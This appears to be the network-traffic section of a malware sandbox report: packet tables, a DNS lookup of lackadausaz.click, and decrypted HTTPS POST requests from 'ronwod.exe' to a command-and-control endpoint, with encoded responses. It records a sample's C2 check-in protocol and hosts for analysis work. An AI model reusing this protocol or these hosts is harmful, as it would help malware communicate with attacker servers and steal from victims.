Dec 28, 2024 08:17:42.238132000 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:42.238198996 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:42.238782883 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:42.238792896 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:43.452604055 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:43.452697039 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:43.454346895 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:43.454354048 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:43.454551935 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:43.456254959 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:43.456387043 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:43.456414938 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:44.329654932 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:44.329749107 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:44.329891920 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:44.329962015 CET	49733	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:44.329977036 CET	443	49733	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:44.532141924 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:44.532233000 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:44.532325029 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:44.532639980 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:44.532676935 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:45.788455009 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:45.788644075 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:45.789856911 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:45.789872885 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:45.790076971 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:45.791277885 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:45.791415930 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:45.791451931 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:45.791518927 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:45.791529894 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:46.876559973 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:46.876682997 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:46.876756907 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:46.876954079 CET	49734	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:46.876998901 CET	443	49734	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:47.204881907 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:47.204919100 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:47.204996109 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:47.205321074 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:47.205332041 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:48.507802010 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:48.507870913 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:48.509520054 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:48.509530067 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:48.509730101 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:48.510852098 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:48.510927916 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:48.510931969 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:49.171304941 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:49.171384096 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:49.171435118 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:49.171627045 CET	49735	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:49.171639919 CET	443	49735	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:49.670686007 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:49.670728922 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:49.670806885 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:49.671360016 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:49.671375036 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.929160118 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.929223061 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.930775881 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.930788040 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.930988073 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.932326078 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.933103085 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.933147907 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.933285952 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.933321953 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.933482885 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.933525085 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.933708906 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.933743954 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.934025049 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.934061050 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.934288025 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.934319973 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.934331894 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.934349060 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.934619904 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.934647083 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.934674025 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.934906006 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.934947014 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.979370117 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.979686975 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.979721069 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.979744911 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.979768991 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:50.979814053 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:50.979846954 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:56.820399046 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:56.820473909 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:56.820542097 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:56.820743084 CET	49736	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:56.820759058 CET	443	49736	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:56.855174065 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:56.855207920 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:56.855297089 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:56.855643988 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:56.855653048 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.112828016 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.112903118 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.116588116 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.116596937 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.116796017 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.125288010 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.125318050 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.125344992 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.967524052 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.967595100 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.967642069 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.967834949 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.967848063 CET	443	49741	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:58.967858076 CET	49741	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:58.967861891 CET	443	49741	104.21.92.219	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 08:17:34.397460938 CET	61760	53	192.168.2.4	1.1.1.1
Dec 28, 2024 08:17:34.536711931 CET	53	61760	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 08:17:34.397460938 CET	192.168.2.4	1.1.1.1	0x8b5b	Standard query (0)	lackadausaz.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 08:17:34.536711931 CET	1.1.1.1	192.168.2.4	0x8b5b	No error (0)	lackadausaz.click		104.21.92.219	A (IP address)	IN (0x0001)	false
Dec 28, 2024 08:17:34.536711931 CET	1.1.1.1	192.168.2.4	0x8b5b	No error (0)	lackadausaz.click		172.67.198.222	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lackadausaz.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:35 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lackadausaz.click
2024-12-28 07:17:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 07:17:36 UTC	1127	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b8pns4eu8ql47ub0fl0al5tl50; expires=Wed, 23 Apr 2025 01:04:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wbXIVlf8Ps29g1LQsaqWxiSTlOmxa3aGSjC%2F9umTDuRUwhPzjxGL2tga01Q4CUmG8utAoJvBBq3RbiWcEEPjW6cWsTB3fGJUIez%2F7AeDA9gG9Y8ntYUN5J0Hc9S2DgVDCNDFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc584884dc439-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1560&rtt_var=586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1864623&cwnd=207&unsent_bytes=0&cid=5c224d3a72fc8d85&ts=771&x=0"
2024-12-28 07:17:36 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 07:17:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:37 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: lackadausaz.click
2024-12-28 07:17:37 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=IRiaFi--26dek1&j=
2024-12-28 07:17:38 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rs6joe92u0e339tb6mguseh2lp; expires=Wed, 23 Apr 2025 01:04:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RQ65EF0g9MmbybP29poFcFK6brzyZUShC9qgQJj%2FZz8O1qqDcjG7AqvmLy8OA%2FecOoDwhbOP%2BDweKOF56Kc2lRc8C85z%2Fw9HODPWzm%2FG5g2Dcvw3I0TAD0KWwvNC66iD7amKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc591c8707c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1963&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=949&delivery_rate=1468812&cwnd=235&unsent_bytes=0&cid=4096fa398120a3fa&ts=793&x=0"
2024-12-28 07:17:38 UTC	236	IN	Data Raw: 31 34 38 37 0d 0a 70 69 44 53 7a 74 4b 49 71 52 69 72 53 67 74 77 78 79 65 70 58 4a 69 32 32 4d 53 68 56 38 4e 6e 4f 49 69 4d 64 6c 66 5a 2f 65 66 64 41 71 54 73 36 4c 79 46 4f 74 67 76 4b 55 71 7a 56 64 77 35 74 4a 53 35 6f 49 4e 74 70 51 5a 55 2b 2b 6c 61 64 61 2b 51 78 5a 78 47 73 36 4b 68 37 59 55 36 7a 6a 49 70 53 70 78 63 69 7a 6e 32 6c 4f 4c 6d 78 44 32 68 42 6c 54 71 37 52 30 34 71 5a 47 45 7a 6b 79 31 70 72 66 72 7a 58 6e 48 4a 32 34 56 6f 6b 62 44 4d 76 48 62 73 4b 6d 44 65 2b 45 43 51 71 71 32 56 42 71 38 69 59 62 72 51 61 47 6c 38 50 57 46 59 34 6b 76 5a 56 4c 39 42 63 67 35 2b 74 71 2b 6f 4d 6f 2f 71 77 39 63 36 2b 67 63 4a 37 43 62 6a 38 35 43 74 71 65 39 34 74 6c 30 7a 53 42 6c 45 36 Data Ascii: 1487piDSztKIqRirSgtwxyepXJi22MShV8NnOIiMdlfZ/efdAqTs6LyFOtgvKUqzVdw5tJS5oINtpQZU++lada+QxZxGs6Kh7YU6zjIpSpxcizn2lOLmxD2hBlTq7R04qZGEzky1prfrzXnHJ24VokbDMvHbsKmDe+ECQqq2VBq8iYbrQaGl8PWFY4kvZVL9Bcg5+tq+oMo/qw9c6+gcJ7Cbj85Ctqe94tl0zSBlE6
2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 68 47 69 33 43 36 30 36 4c 6d 6d 33 58 79 4e 31 6e 37 2f 77 45 34 71 35 6e 46 32 77 79 70 37 4c 66 6d 69 79 4b 4a 49 47 55 63 6f 45 62 45 4f 66 76 55 71 4b 6e 44 4e 71 6b 4e 58 75 44 68 47 7a 71 31 6c 59 4c 4d 53 37 65 6a 74 2b 4c 4e 64 63 70 6f 4a 31 4b 69 58 59 74 6d 75 76 53 71 70 63 41 68 72 42 51 61 39 61 41 4e 64 62 79 54 78 5a 77 43 74 71 4b 78 35 38 74 6f 77 53 4e 69 46 37 64 4f 77 6a 50 33 31 4c 65 73 7a 44 61 68 41 6c 44 67 34 52 34 78 74 70 4b 44 78 45 4c 77 34 76 44 74 30 7a 71 52 61 45 6f 58 74 55 4c 48 4b 4c 6a 75 2b 72 6d 4e 4c 4f 45 43 56 71 71 32 56 44 32 2b 6e 49 62 50 54 62 4f 6b 75 2f 6a 4c 61 4d 38 6c 62 41 43 6a 51 4d 55 30 2b 63 61 77 71 4d 55 32 71 41 35 54 37 2b 6b 51 64 66 58 66 67 74 77 43 36 4f 79 52 35 38 42 32 77 7a 39 70 55 Data Ascii: hGi3C606Lmm3XyN1n7/wE4q5nF2wyp7LfmiyKJIGUcoEbEOfvUqKnDNqkNXuDhGzq1lYLMS7ejt+LNdcpoJ1KiXYtmuvSqpcAhrBQa9aANdbyTxZwCtqKx58towSNiF7dOwjP31LeszDahAlDg4R4xtpKDxELw4vDt0zqRaEoXtULHKLju+rmNLOECVqq2VD2+nIbPTbOku/jLaM8lbACjQMU0+cawqMU2qA5T7+kQdfXfgtwC6OyR58B2wz9pU
2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 2b 39 73 61 32 72 4d 55 36 72 41 6b 61 70 4b 34 54 4c 66 76 48 78 65 35 42 70 4b 2b 36 71 50 35 35 78 79 5a 75 42 4f 56 61 68 53 65 36 30 37 62 6d 6d 33 57 73 42 46 4c 73 2f 42 73 34 75 4a 47 4c 79 30 65 2f 70 4c 44 71 78 6e 2f 4e 49 32 49 52 71 45 48 5a 4e 50 72 63 76 36 66 4a 50 2b 46 4c 47 75 33 32 56 47 33 37 72 70 4c 50 41 49 57 76 76 75 54 4d 62 49 6b 33 4a 77 76 6c 51 73 64 2b 6f 70 53 33 72 73 59 77 72 67 52 51 35 4f 73 65 4f 62 4f 52 68 74 5a 4e 74 4b 79 38 34 73 46 33 78 79 78 68 47 36 35 4f 7a 54 37 37 33 76 72 6f 67 7a 4b 35 52 51 4b 71 32 68 4d 35 74 70 44 48 38 55 47 2b 6f 72 66 38 69 32 57 48 4d 53 6b 56 71 51 57 54 66 76 62 64 75 71 33 4a 4d 61 45 43 56 2b 2f 74 45 7a 61 32 6d 49 2f 4b 52 62 53 67 75 65 66 4e 65 73 34 73 62 41 43 67 54 4d Data Ascii: +9sa2rMU6rAkapK4TLfvHxe5BpK+6qP55xyZuBOVahSe607bmm3WsBFLs/Bs4uJGLy0e/pLDqxn/NI2IRqEHZNPrcv6fJP+FLGu32VG37rpLPAIWvvuTMbIk3JwvlQsd+opS3rsYwrgRQ5OseObORhtZNtKy84sF3xyxhG65OzT773vrogzK5RQKq2hM5tpDH8UG+orf8i2WHMSkVqQWTfvbduq3JMaECV+/tEza2mI/KRbSguefNes4sbACgTM
2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 74 4c 43 44 4b 75 38 63 47 75 33 69 56 47 33 37 6c 6f 7a 57 54 4c 36 6c 76 65 7a 44 66 63 63 6c 59 68 53 75 51 73 77 34 39 39 79 33 6f 38 41 30 70 51 39 49 36 65 55 65 4f 4c 48 66 79 34 52 46 71 4f 7a 6f 71 75 78 32 34 44 68 79 41 4c 4d 46 31 48 44 6a 6c 4c 32 71 67 32 33 68 42 6c 58 6a 34 52 77 39 74 4a 43 42 79 6b 53 32 6f 62 58 6c 77 57 6a 42 4a 6d 51 5a 71 6b 37 5a 50 76 66 51 74 71 4c 4c 50 71 74 46 46 4b 72 70 44 48 58 6a 33 37 44 4a 54 62 43 76 70 71 72 55 4e 4e 42 6f 62 68 37 6c 48 59 73 79 39 4e 53 31 71 73 38 2b 71 51 52 57 35 4f 6b 52 50 4c 4f 58 6c 38 56 47 75 4b 32 2b 35 63 70 2b 7a 43 31 74 46 61 46 44 78 48 36 30 6c 4c 32 2b 67 32 33 68 4b 6e 33 66 72 44 55 50 2b 34 44 4c 33 51 4b 33 6f 50 43 79 69 33 62 4b 4a 47 45 64 6f 30 7a 48 4e 50 50 Data Ascii: tLCDKu8cGu3iVG37lozWTL6lvezDfcclYhSuQsw499y3o8A0pQ9I6eUeOLHfy4RFqOzoqux24DhyALMF1HDjlL2qg23hBlXj4Rw9tJCBykS2obXlwWjBJmQZqk7ZPvfQtqLLPqtFFKrpDHXj37DJTbCvpqrUNNBobh7lHYsy9NS1qs8+qQRW5OkRPLOXl8VGuK2+5cp+zC1tFaFDxH60lL2+g23hKn3frDUP+4DL3QK3oPCyi3bKJGEdo0zHNPP
2024-12-28 07:17:38 UTC	920	IN	Data Raw: 44 47 69 41 56 2f 6c 37 78 55 7a 71 5a 69 4d 31 6b 79 39 6f 37 6a 69 77 6e 76 4e 4c 57 51 55 71 55 2f 4b 4f 66 54 61 73 75 61 4e 64 61 59 64 47 72 4b 75 4e 53 57 67 6a 5a 50 4a 59 37 32 6a 38 50 57 46 59 34 6b 76 5a 56 4c 39 42 63 49 73 2f 74 6d 6f 72 38 51 37 72 67 5a 49 36 2b 4d 66 4a 37 79 51 67 63 4e 4f 74 71 4f 32 36 38 35 77 78 53 39 73 47 61 70 4a 69 33 43 36 30 36 4c 6d 6d 33 57 50 44 6b 6e 39 37 52 6f 2b 72 59 54 46 32 77 79 70 37 4c 66 6d 69 79 4b 4a 4b 32 49 5a 6f 55 58 48 50 76 37 5a 75 72 54 4d 4d 71 59 4d 55 66 6a 6b 45 7a 4b 77 6c 34 37 4c 52 4b 4b 67 76 76 6a 4f 61 4e 74 6f 4a 31 4b 69 58 59 74 6d 75 75 4b 39 74 74 4d 32 34 7a 52 4d 36 66 67 66 4f 4c 66 66 6d 6f 70 62 38 4b 75 38 71 70 4d 36 7a 79 64 67 45 61 70 45 77 6a 4c 33 30 62 4f 6a Data Ascii: DGiAV/l7xUzqZiM1ky9o7jiwnvNLWQUqU/KOfTasuaNdaYdGrKuNSWgjZPJY72j8PWFY4kvZVL9BcIs/tmor8Q7rgZI6+MfJ7yQgcNOtqO2685wxS9sGapJi3C606Lmm3WPDkn97Ro+rYTF2wyp7LfmiyKJK2IZoUXHPv7ZurTMMqYMUfjkEzKwl47LRKKgvvjOaNtoJ1KiXYtmuuK9ttM24zRM6fgfOLffmopb8Ku8qpM6zydgEapEwjL30bOj
2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 33 34 39 35 0d 0a 70 77 6e 6e 4f 49 57 38 5a 70 6b 2f 45 4f 66 7a 51 75 71 33 45 4f 36 63 41 55 65 4f 75 57 6e 57 38 68 38 57 63 41 70 61 50 6f 76 6a 35 64 4d 6f 7a 4b 51 33 72 58 49 73 35 39 70 54 69 35 73 67 39 72 68 64 66 34 2b 59 51 50 4c 75 62 6a 38 6c 46 73 4b 6d 39 37 38 39 30 7a 53 39 70 48 71 70 43 77 7a 48 2b 31 4c 58 6d 6a 58 57 6d 48 52 71 79 72 6a 51 2b 72 62 36 4c 7a 31 44 77 73 2f 37 7a 69 33 33 46 61 44 46 53 71 30 7a 4b 4e 76 54 59 73 71 4c 52 4e 61 6f 4d 56 65 76 68 46 44 61 36 6c 59 33 57 52 4c 43 6e 75 4f 33 44 66 73 63 36 61 42 33 6c 43 34 73 35 34 70 54 69 35 76 49 6a 70 67 4a 56 71 4d 63 54 4c 72 71 56 68 73 39 4f 38 4c 50 2b 38 34 74 39 78 57 67 78 55 71 68 4a 78 6a 72 6f 32 4c 71 6d 79 6a 4b 72 46 31 58 6c 34 78 63 31 76 6f 32 45 Data Ascii: 3495pwnnOIW8Zpk/EOfzQuq3EO6cAUeOuWnW8h8WcApaPovj5dMozKQ3rXIs59pTi5sg9rhdf4+YQPLubj8lFsKm97890zS9pHqpCwzH+1LXmjXWmHRqyrjQ+rb6Lz1Dws/7zi33FaDFSq0zKNvTYsqLRNaoMVevhFDa6lY3WRLCnuO3Dfsc6aB3lC4s54pTi5vIjpgJVqMcTLrqVhs9O8LP+84t9xWgxUqhJxjro2LqmyjKrF1Xl4xc1vo2E
2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 43 78 37 63 78 78 32 79 4e 37 47 61 31 47 78 54 62 7a 31 4c 53 6d 77 6a 69 68 52 52 53 71 36 51 78 31 34 39 2b 67 35 31 57 6d 70 76 4c 4a 33 47 7a 44 4c 32 55 45 72 6b 54 49 4b 50 66 45 2b 75 69 44 4a 4b 59 55 47 72 4c 34 42 43 4b 38 67 4d 76 64 41 72 65 67 38 4c 4b 4c 63 63 59 6d 5a 42 6d 68 54 4d 34 32 2b 64 47 2f 72 4d 38 35 6f 41 31 54 34 4f 73 52 4d 37 47 63 69 38 74 44 76 4b 69 35 35 4d 49 36 68 32 68 75 43 75 55 64 69 77 6a 71 30 36 4b 72 30 33 65 54 42 6b 76 37 2b 78 6b 6c 76 64 32 71 78 30 36 7a 71 62 66 36 69 32 57 48 4d 53 6b 56 71 51 57 54 66 76 72 51 74 71 58 45 4f 36 34 49 56 65 33 6c 47 7a 2b 31 6a 59 72 42 53 72 79 6b 76 66 6a 42 63 4e 73 68 59 42 2b 72 54 64 6b 39 75 70 72 36 6f 64 74 31 2b 55 56 6f 34 4f 30 59 49 37 61 51 78 64 73 4d 71 Data Ascii: Cx7cxx2yN7Ga1GxTbz1LSmwjihRRSq6Qx149+g51WmpvLJ3GzDL2UErkTIKPfE+uiDJKYUGrL4BCK8gMvdAreg8LKLccYmZBmhTM42+dG/rM85oA1T4OsRM7Gci8tDvKi55MI6h2huCuUdiwjq06Kr03eTBkv7+xklvd2qx06zqbf6i2WHMSkVqQWTfvrQtqXEO64IVe3lGz+1jYrBSrykvfjBcNshYB+rTdk9upr6odt1+UVo4O0YI7aQxdsMq
2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 66 66 63 63 75 61 56 4c 72 42 63 52 2b 6f 75 33 36 37 6f 4d 4b 37 30 56 43 71 72 5a 55 41 4c 69 52 69 38 4e 55 6f 65 47 54 2f 64 31 77 30 6d 70 50 46 62 52 4d 33 54 50 6f 6c 50 54 6d 78 58 58 35 56 52 53 71 36 67 56 31 34 38 2f 58 6e 78 66 6a 2b 2b 43 34 31 44 54 51 61 48 39 53 2f 52 65 46 66 75 69 55 34 75 61 45 4e 72 4d 58 58 4f 6e 34 46 33 4b 46 6f 61 58 50 56 4c 47 68 75 2b 62 31 52 4e 77 72 5a 78 79 69 55 39 70 2b 74 4a 53 31 35 70 73 4d 34 55 30 61 31 61 42 55 4c 66 76 48 78 66 46 42 76 71 4b 33 2f 4e 6f 33 36 53 4e 2f 45 36 68 4f 78 33 7a 37 32 61 71 68 67 33 76 68 41 78 71 79 76 6c 70 31 76 34 37 46 6e 42 4c 69 39 2b 57 35 6e 43 71 62 4e 79 63 4c 35 56 4f 4c 5a 71 69 61 2b 72 53 44 62 65 46 43 57 66 6a 38 45 6a 61 74 6e 4d 4c 36 66 4a 43 6e 76 4f Data Ascii: ffccuaVLrBcR+ou367oMK70VCqrZUALiRi8NUoeGT/d1w0mpPFbRM3TPolPTmxXX5VRSq6gV148/Xnxfj++C41DTQaH9S/ReFfuiU4uaENrMXXOn4F3KFoaXPVLGhu+b1RNwrZxyiU9p+tJS15psM4U0a1aBULfvHxfFBvqK3/No36SN/E6hOx3z72aqhg3vhAxqyvlp1v47FnBLi9+W5nCqbNycL5VOLZqia+rSDbeFCWfj8EjatnML6fJCnvO
